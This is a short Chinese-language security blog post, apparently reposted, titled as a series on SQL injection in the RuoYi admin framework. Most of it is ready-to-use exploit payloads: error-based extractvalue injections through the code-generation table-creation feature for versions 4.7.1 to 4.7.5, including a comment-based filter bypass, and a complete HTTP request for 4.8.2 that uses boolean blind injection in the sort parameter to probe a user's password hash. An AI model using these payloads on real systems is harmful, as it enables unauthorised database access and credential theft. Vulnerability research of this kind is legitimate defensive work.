文章总结： 文档解析了若依RuoYi框架多个版本的SQL注入漏洞，涵盖4.7.1至4.7.5版本代码生成功能的注入利用及绕过方法，以及4.8.2版本系统用户列表接口的布尔盲注。文中直接提供了用于漏洞验证的POC代码及请求报文。 综合评分： 75 文章分类： 漏洞分析,漏洞POC,WEB安全

RuoYi 后台SQL注入漏洞系列2

安全艺术

安全艺术

2026年1月9日 16:50 北京

1. RuoYi（4.7.1-4.7.4）

1.1. SQL注入

代码生成-创建

CREATE table a1 as SELECT extractvalue(1,concat(0x7e,(select database())));

2. RuoYi-4.7.5

2.1. SQL注入

代码生成-创建

绕过

CREATE table a1 as SELECT/**/extractvalue(1,concat(0x7e,(select/**/database())));

3. RuoYi-4.8.2

3.1. SQL注入

POST /system/user/list HTTP/1.1
Host: 192.168.3.102
Content-Length: 147
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-Token: yneu6NWAntf9M703Tou1JfwSF79sF9YSzrqFCT9wmL0=
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.102
Referer: http://192.168.3.102/tool/gen/createTable
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: JSESSIONID=0627cca5-d25b-4156-8f9e-b48eb4d0d1ea
Connection: keep-alive

pageNum=1&pageSize=10&orderByColumn=status&isAsc=,CASE WHEN u.user_id LIKE 2 THEN CASE WHEN u.password LIKE 0x24326125 THEN 0 ELSE 2 END ELSE 1 END

更多内容进群了解哈。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安全艺术 安全艺术《RuoYi 后台SQL注入漏洞系列2》